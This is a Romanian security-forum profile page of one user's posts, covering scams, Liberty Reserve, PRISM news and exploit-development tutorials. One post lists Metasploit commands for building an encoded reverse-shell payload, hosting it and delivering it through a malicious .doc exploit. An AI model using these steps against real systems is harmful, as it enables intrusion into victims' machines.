-
Posts
879 -
Joined
-
Last visited
-
Days Won
24
Everything posted by neox
-
Trezeste nu mai visa
-
Nu am inceles ce vrei defapt dar Let me google that for you si http://ro.lmgtfy.com/?q=WPA2-PSK+%20CommView
-
Sa stii ca jumate din Irlanda nu mai poate accesa Pirate Bay pentru nu toti le merge mintea sa foloseaca un proxy, multi stiu numai sa downloadeze musica filme facebook,twitter etc in rest habar nu au sa foloseasca un pc. Tarile care nu au bani pentru cumpararea cd dvd original sint mai priceputi sa evite restrictiile ce sint pe net In Germania de exemplu au inchis kino.to si multe alte pagini cu filme au pus restrictii pe ele , dupa 2 luni a scazut numarul de utilizatori si multe pagini le-a inchis propetari pentru ca nu sa mai rentat. (Concluzie: ori le-a fost frica sa mai acceseze pagini cu filme ori habar nu au cu sa folosesca un proxy)
-
Adica vrei sa zici ca il cunosti kingcope ?
-
Bine ai venit
-
Asta nu cred pentru ca care are deja 1000 nu se ocupa de gainarii de felul asta Ce am observat pe forumul RST copii dau teapa la copii Un user cu 1000 de posturi nu scria asa ceva ca un amator
-
Toti aicia sunt neseriosi si forumul la fel, numai tu esti serios geoxnox a zis ====in loc de sustinere primesti palme peste ochii , imi pare rau pt timpul pierdut cu postarea Da nu te sustine la dat teapa nu esti primul si nici ultimul cu vrajeli de 15 ani suntem satui toti aicea pe forum de discuti de felul asta.
-
Dovada trebuie sa vina de la tine, ca tu vrei sa vinzi nu sa intrie cineva undeva sa vada dovada ca sa cumpere cineva ceva trebuie sa dovedesti altfel iese numai povesti aicea si nimeni nu te baga in seama Deja o dai in vrajeala poti sa faci un video si cenzurezi ce nu vrei sa arati
-
Ai citit macar regulile? sau esti un user vechi cu nick nou categoria asta nu se face vanzare bagate la market,cred ca miroase a ban
-
Microsoft could intercept Skype conversation, is it true?
neox replied to Dragos's topic in Stiri securitate
Da clar ,dar uitate cine ii spioneaza pe microsoft https://rstforums.com/forum/70326-nsa-prism-program-taps-user-data-facebook-yahoo-skype-others.rst -
The National Security Agency has obtained direct access to the systems of Google, Facebook, Apple and other US internet giants, according to a top secret document obtained by the Guardian. The NSA access is part of a previously undisclosed program called PRISM, which allows officials to collect material including search history, the content of emails, file transfers and live chats, the document says. The Guardian has verified the authenticity of the document, a 41-slide PowerPoint presentation – classified as top secret with no distribution to foreign allies – which was apparently used to train intelligence operatives on the capabilities of the program. The document claims "collection directly from the servers" of major US service providers. Although the presentation claims the program is run with the assistance of the companies, all those who responded to a Guardian request for comment on Thursday denied knowledge of any such program. In a statement, Google said: "Google cares deeply about the security of our users' data. We disclose user data to government in accordance with the law, and we review all such requests carefully. From time to time, people allege that we have created a government 'back door' into our systems, but Google does not have a back door for the government to access private user data." Several senior tech executives insisted that they had no knowledge of PRISM or of any similar scheme. They said they would never have been involved in such a program. "If they are doing this, they are doing it without our knowledge," one said. http://www.washingtonpost.com/wp-srv/special/politics/prism-collection-documents/ NSA PRISM program taps in to user data of Facebook, Yahoo and others | World news | The Guardian http://www.businessinsider.com/apple-prism-2013-6 U.S., British intelligence mining data from nine U.S. Internet companies in broad secret program - The Washington Post video http://openchannel.nbcnews.com/_news/2013/06/06/18809021-sources-us-intelligence-agencies-tap-servers-of-top-internet-companies?lite
-
LR a fost demult supravegheata asta a pus capac la toate si ca urmare inchiderea LR https://rstforums.com/forum/69079-jaful-secolului-21-la-bancomate-45mil.rst#post446661 Toti bani ia spalat prin LR Da ai dreptate
-
Web Application Defender's Cookbook: Battling Hackers and Protecting Users English | ISBN: 1118362187 | 2013 | PDF | 552 pages | 14 MB The top-selling book Web Application Hacker's Handbook showed how attackers and hackers identify and attack vulnerable live web applications. This new Web Application Defender's Cookbook is the perfect counterpoint to that book: it shows you how to defend. Authored by a highly credentialed defensive security expert, this new book details defensive security methods and can be used as courseware for training network security personnel, web server administrators, and security consultants. 1118362187.pdf (14,62 MB) - uploaded.net Zippyshare.com - Wiley.Web.Application.Defenders.Cookbook.Battling.Hackers.and.Protecting.Users.2013.RETAiL.eBook-DeBTB00k.rar
-
- 1
-
Nu mai deschide ramine inchis cine a avut bani acolo, pa si larevedere (bani confiscati) Au participat 16 tari la inchiderea Libertyreserve In frunte Americani (organizatia care a inchis si megaupload ) Libertyreserve este acuzata de sp?lare de bani Ofticosi statul ca nu au incasat TVA ca nu au primit si ei o bucata de prajitura Statistica: 55 de milioane de tranzactii procesate - cea mai mare parte a fost ilegal. Cica pe Libertyreserve sint bani care apartin Mafia, bani din pagini care au practicat pornografie de copii , etc Tranzacti in valoare de 6 miliarde $ Actualitati in germana care incelege Geldwäschering: Wie Liberty Reserve funktionierte | tagesschau.de
-
Verified: Verified --------------> de cine de tine ???? fara Poc este abureala
-
1.Creezi payload.exe cu metasploit local msfpayload windows/shell/reverse_tcp LHOST=192.168.206.129 R | msfencode -e x86/shikata_ga_nai -c 4 -t exe -o /root/Desktop/payload.exe sau folosesti trojan server.exe 2.Urci serverul.exe pe un hosting gratis online 3.Folosesti exploitul in python 4.Daca ai folosit server trojan il chemi cu trojan respectiv 5.Cu metasploit msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.206.129 E O problema este ca tipul care a facut exploitul nu a creat heder corect de la fisierul tip format .doc ca sa fie cit mai exact ca un document.doc Si daca ai fantezie buna poti combina cu mai multe posibilitati
-
Am testat si eu dar merge numai local In topicul asta tot asa cred ca foloseste local scriptul de aicia MS13-009 Internet Explorer WScript.Shell Remote Code Excution https://rstforums.com/forum/68132-ms13-009-internet-explorer-wscript-shell-remote-code-excution.rst si vrea sa vinda <html> <head> <title>Application Executer</title> <HTA:APPLICATION ID="oMyApp" APPLICATIONNAME="Application Executer" BORDER="no" CAPTION="no" SHOWINTASKBAR="yes" SINGLEINSTANCE="yes" SYSMENU="yes" SCROLL="no" WINDOWSTATE="normal"> <script type="text/javascript" language="javascript"> function RunFile() { WshShell = new ActiveXObject("WScript.Shell"); WshShell.Run("c:/windows/system32/calc.exe", 1, false); } </script> </head> <body> <input type="button" value="Run calc" onclick="RunFile();"/> </body> </html>
-
Stack Buffer Overflow - Surgemail
neox replied to Kwelwild's topic in Reverse engineering & exploit development
sal Kwelwild eu nu vad legatura intre numele de la Topic "Stack Buffer Overflow - Surgemail" cu video -
MS13-009 Internet Explorer WScript.Shell Remote Code Excution
neox replied to thehat's topic in Exploituri
Nu poti sa stii daca merge sau nu, avezi grija ca sint multi mincinosi pe 1337day.com mai ales cu account nou si cica controlat de admini ,vor sa faca ceva bani pe lucruri false . Daca arata de exemplu cu ProcessExplorer procesul si vedeam ca deschide proces nou ,dar eu cred ca executa local scriptul -
Saltut la toti de pe rst Tutorialul 2 din Win32 Exploit Development Buffer Overflow Cuprins: https://imageshack.com/i/mk20130612142252j Download tools win32 exploit development-tools-02 Download video si tools part1 EXploit-dev2.part1.rar part2 EXploit-dev2.part2.rar Video Win32 Exploit Development-02 on Vimeo video 01:26min
-
Am vazut azi la tv stire de 30 min pe tema asta, a zis asa au prins numai sagetile este o mafie peste 100 de persoane (presupune) dar ceva profesional deci nu amatori, ce au facut? deci ei nu au clonat numai cartile de banca au intrat si in datele de banci si au facut asa ceva de exemplu: o carte de banca avea limita pe ia de -500$ au marit limita de pina in -20000$ si au ridicat banii, si au spalat bani prin lucruri cumparate de lux si majoritatea sumelor mari de bani iau ridicat din doua banci Arabe acestea fiind hackuite. ceva mai detaliat care incelegeti germana Bankraub 2.0: Hacker ergaunern 45 Millionen Dollar - Panorama - News - Schweizer Radio und Fernsehen
-
DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow
neox replied to neox's topic in Exploituri
Acuma sint aproape gata cu tutorial video cu partea doua "Cum dezvolti un exploit" si contine Fuzzing Identificarea Offsets Identificarea Usable Characters Jmp memory adress No Operation (NOP) Shellcode Encoding Crearea unui modul Metasploit Proof of Concept Poc la diverse programe(player etc…) etc.. la multe player si alte programe cu diferite metode de la inceput la capat